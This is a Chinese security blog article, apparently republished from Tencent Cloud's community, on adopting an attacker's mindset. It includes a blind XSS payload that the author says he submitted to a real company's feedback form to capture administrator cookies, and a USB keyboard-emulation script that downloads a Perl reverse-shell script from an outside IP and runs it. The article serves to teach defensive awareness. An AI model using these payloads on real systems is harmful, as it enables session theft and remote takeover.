热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

【黑客浅析】像黑客一样思考

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~作者:由云鼎实验室发表在云+社区网络安全里经常说的一句话是未知攻焉知防,基本所有的安全人员也是一名黑客,在黑客攻击愈发普遍的

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~

作者:由云鼎实验室发表在云+社区

网络安全里经常说的一句话是未知攻焉知防,基本所有的安全人员也是一名黑客,在黑客攻击愈发普遍的今天,如何更好的防御黑客攻击?用句带有点哲学的话,成为黑客,只有成为黑客,像黑客一样思考,你才能知道从哪去防御黑客;很俗的一句话,但很实在!

看到了什么?

看到上图的第一直觉,你可以自己想下答案,问问自己看到了什么?

正常的思维,第一直观感受是中间那个很明显,很大的黑点,因为这个黑点最吸引大家的注意力,稍微看过一些哲学故事的同学可能会想到黑点周围白色的区域,是的,黑点只是其中一个小点,而黑点周围白色的部分则足够大;但是,我不知道有没有人的答案是白色再外面?文章区域再外面?或者整个浏览器?整个电脑屏幕?电脑外呢?其实想表达的也正是黑客的思维里,永远不是局限于可以看到的部分,而在于能够想到或者没想到的所有面。

其实这类同于攻击面!安全是木桶短板原理,木桶能装多少水不在于最长的那块板,而是最短的那块;而一个系统的安全程度不取决于安全做的多全,做的多高大上,而在于是否把那些最简单的问题处理掉?数据告诉我们,服务器入侵,除了漏洞之外最大途径是弱口令,而这就是一个根本没多少技术含量的方式,属于安全基线问题,就是同样的道理。对于黑客而言,攻击面不会局限于能够看到的点,而在于所有可能关联或者没关联的面,就比如渗透测试或者说APT,很多时候结合社工这个点能够取得很好的效果,成为一个绝佳的入侵渠道。所以,第一点,学会放开自己的思维与想象,发现和关注平时所容易忽略和没有看到的地方。

什么是黑客?

什么是黑客?我用八个字总结,突破创造,守正出奇。在我看来,黑客永远不是一个贬义词,黑客本身就是极客,对于黑客来说,这个世界充满好奇,这个世界有太多的东西可以探索,特别是网络的世界。

黑客是一个追求自由的群体,不喜欢受到条条框框的约束,总是喜欢突破这一切,突破同时也可能是一种创造,创造新的方法,新的方式,新的工具,新的东西,就比如上图,小学课本里的乌鸦喝水,在我们看来是一种很傻的行为,但未尝不是一种稳定传统的方式?在生活中很多的事不也正如此?或者说就网络上很多安全的措施有时候也是稳定起见,因为新的东西除了先进,有时候也会带来风险。而对于黑客来说,可能考虑的更不是这些,而是尝试,好奇一切。

对于黑客而言,也有自己的黑客精神,有自己要坚持和秉承的东西(地下黑客的原则可能不同于正常黑客),这就是守正,自由、共享、平等、互助;在Web安全的世界里,我们经常会提到一个词"猥琐",或者说不仅限于Web安全,因为很多时候攻击的产生不是利用一个多厉害的漏洞,而在于猥琐的思路,几个定义为低危的小漏洞的组合也许威力比一个高危漏洞还大,这就取决于漏洞的组合使用,利用思路;这些"猥琐行为"就是一种出奇的表现。

了解黑客,成为黑客,才能更好的学会黑客的思考。

看到框就想X

这是一个意见反馈的界面,看到这样一个界面,大家会怎么做?对于普通人来说,这就是一个正常的意见提交框,用处就是提交反馈内容;大家想想黑客会怎么做?提交攻击代码,比如下面的代码:

</textarea>'">=http://t.cn/R63bUP9></script>

实际上,当时看到这样一个功能,我就这样做了。这是360手游客服中心手机版的一个页面,可以提交反馈意见,我当时就直接提交了上面的攻击代码,然后就攻击成功了(这其实是一次XSS盲打,什么是XSS盲打大家可以自行搜索或者看我之前发的文章)。由于这样的功能往往看反馈内容的都是系统的相关管理员,于是被攻击成功的也是管理员,通过XSS盲打可以直接拿到管理员登录的账号的COOKIE等信息(下图就是盲打平台中收到的攻击成功返回的后台地址和管理员COOKIE)。

当然,不仅限于这个页面,还有其他的:

这种行为总结而言,就是"看到框就想X",这里的X也就是XSS的意思;其实这更多的是一种习惯和意识,在黑客的想法里,看到功能首先想到的不是使用,而是能不能利用,然后由于攻击做的多了,看到不同的功能和应用页面,自然就能意识到可能存在的问题,自然而然的就会去测试;经常会有很多人问,那些人在各种SRC提交的漏洞都是怎么挖的,是不是有神器?但是也不是每个人的安全测试工具都是神器啊!其实很多时候是在使用中发现漏洞!

不同的潜意识行为和想法,取决于不同的知识面和经验,也取决于不同的目的。

功能也是攻击方式

如果手机没电了,那么旁边如果其他人正好有电脑,借用其他人电脑的USB口给手机充电是一件很常见的事,但其实,只是插个数据线,也可以导致电脑被攻击,下面视频演示的是一部手机通过USB连接MAC电脑执行指定的命令(视频里是ifconfig)。

 https://v.qq.com/x/page/q03959yfsxh.html

视频里的手机是一个很普通的手机,安装了一个叫做"Nethunter"的黑客操作系统,也就成为"黑客手机",里面集成了一些黑客攻击工具,比如视频里演示的工具叫做DuckHunter HID。看到这个视频,大家是否会觉得这个攻击挺高端的,物理黑客攻击,但当我告诉大家原理之后,大家可能想到的就是"原来如此,这么简单"。

手机上显示的代码是:

CONTROL SPACE
STRING iterm
ENTERENTER
STRING
ifconfig
ENTER

看完这个代码不知道大家是否已经明白了攻击原理,熟悉MAC操作的同学可能知道CONTROL+SPACE其实是调起Spotlight,一个类似快捷启动的工具,然后输入iterm,就是查找iTerm,然后回车,打开iTerm后,再输入ifconfig,再回车,就完成了整个命令输入执行的过程;大家可以发现,这其实就是一个模拟键盘操作的过程,没错,上面视频演示的攻击原理就是模拟键盘操作,其实这时候的手机用USB接入电脑相其实就是把自己设置为键盘接入电脑,然后再直接模拟键盘操作进行攻击。

那么是否可以进行危害更大的攻击?比如反弹Shell?当然可以,改下代码即可:

CONTROL SPACE
STRING iterm 
ENTERENTER
STRING wget http://45.32.8.108/b.pl.txt -O /tmp/b.plSTRING perl /tmp/b.pl 反弹监听IP 监听端口 ENTER

采用下载一个Perl脚本来实现反弹Shell,如下面视频:

 https://v.qq.com/x/page/f0395v8ez5e.html

讲这个例子的目的其实就是这部分的标题,功能也是攻击方式。在黑客的眼里,不是一定得使用漏洞,使用多高端的技巧,能达到攻击目的和效果的方式都是好的攻击方式,这些方式不局限于大家所了解的只是漏洞或者暴力破解等,而经常做的就是利用正常的功能来实现攻击,这种攻击因为使用的是常的功能,有时候反而更隐蔽;而类似的攻击方式,不在少数。

结语

其实,近几年来,大家对黑客的了解已经越来越多,黑客也越来越失去神秘,然后大家就会发现,他们其实也是生活中的普通人;而在黑夜中工作,有时更多的是因为那时候安静,做事效率高,或者是管理员不在线好做一些秘密的攻击和测试等,而不是所谓各种描述里的戴着衣帽,把自己包裹在黑暗中,不露出自己的真面目等。

其实黑客所不同于普通人的点,除了掌握的知识外,就是做事和思考的方式,仅此而已!

 

问答

什么是memcache漏洞?它又有什么样的影响?

相关阅读

【读家】专访Killer:计算机病毒大多没有技术含量

如何确保NFS服务安全

【黑客解析】黑客是如何实现数据库勒索的 ?


此文已由作者授权腾讯云+社区发布,转载请注明文章出处

原文链接:https://cloud.tencent.com/developer/article/1020492

 

 


推荐阅读
  • .NetCoreWebApi生成Swagger接口文档的使用方法
    本文介绍了使用.NetCoreWebApi生成Swagger接口文档的方法,并详细说明了Swagger的定义和功能。通过使用Swagger,可以实现接口和服务的可视化,方便测试人员进行接口测试。同时,还提供了Github链接和具体的步骤,包括创建WebApi工程、引入swagger的包、配置XML文档文件和跨域处理。通过本文,读者可以了解到如何使用Swagger生成接口文档,并加深对Swagger的理解。 ... [详细]
  • 本文介绍了Oracle数据库中tnsnames.ora文件的作用和配置方法。tnsnames.ora文件在数据库启动过程中会被读取,用于解析LOCAL_LISTENER,并且与侦听无关。文章还提供了配置LOCAL_LISTENER和1522端口的示例,并展示了listener.ora文件的内容。 ... [详细]
  • 本文介绍了Web学习历程记录中关于Tomcat的基本概念和配置。首先解释了Web静态Web资源和动态Web资源的概念,以及C/S架构和B/S架构的区别。然后介绍了常见的Web服务器,包括Weblogic、WebSphere和Tomcat。接着详细讲解了Tomcat的虚拟主机、web应用和虚拟路径映射的概念和配置过程。最后简要介绍了http协议的作用。本文内容详实,适合初学者了解Tomcat的基础知识。 ... [详细]
  • Webmin远程命令执行漏洞复现及防护方法
    本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ... [详细]
  • Python SQLAlchemy库的使用方法详解
    本文详细介绍了Python中使用SQLAlchemy库的方法。首先对SQLAlchemy进行了简介,包括其定义、适用的数据库类型等。然后讨论了SQLAlchemy提供的两种主要使用模式,即SQL表达式语言和ORM。针对不同的需求,给出了选择哪种模式的建议。最后,介绍了连接数据库的方法,包括创建SQLAlchemy引擎和执行SQL语句的接口。 ... [详细]
  • 渗透测试基础bypass绕过阻挡我们的WAF(下)
    渗透测试基础-bypass ... [详细]
  • springboot基于redis配置session共享项目环境配置pom.xml引入依赖application.properties配置Cookie序列化(高版本不需要)测试启 ... [详细]
  • 基于STM32的智能循迹小车设计(基础版)
    基于STM32的智能循迹小车设计(基础版)硬件准备1、小车底盘+四直流电机(带轮)2、STM32F103C8T6核心板3、12V8700mAh锂电池(可以用几节18650锂电池)4 ... [详细]
  • idea激活服务器 3月最新注册码
    idea激活服务器3月最新注册码,https:www.yht7.comidea。详细ieda激活码不妨到云海天教程 ... [详细]
  • 下图|通用型_企业用户如何选择合适的云服务器配置?
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了企业用户如何选择合适的云服务器配置?相关的知识,希望对你有一定的参考价值。随着网络飞速发展,企业上云已成为 ... [详细]
  • yii框架目录结构详细分析说明
    php教程|php手册yii,目录结构php教程-php手册yii框架目录结构详细分析说明猫狗大战源码,华为云电脑ubuntu,梦见放走很多爬虫,parttmpphp,seo页面描 ... [详细]
  • 转自:MSMIntroduction如果为了简单使用,你只需要安装一个tomcat(6或者7)和memcached,在生产环境中可能会有多台tomcat服务器以及多台可用的memc ... [详细]
  • nosql数据库的基本要求Nosql全称是NotOnlySQL,是一种不同于关系型数据库的数据库管理系统设计方式。对NoSQL最普遍的解释是“非关系型的”,强调Key-ValueS ... [详细]
  • 一、NoSQL数据库简介Web1.0的时代,数据访问量很有限,用一夫当关的高性能的单点服务器可以解决大部分问题。随着Web2.0的时代的到来,用户访问量大幅度提升,同时产生了大量的 ... [详细]
  • 前言这篇文章是个人对后端工程师的面试复习点总结,不求面面俱到,只求发挥实效。你也可将你面试时遇到的值得记录下来的问题发给我,丰富这篇文章& ... [详细]
author-avatar
手机用户2502894247
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有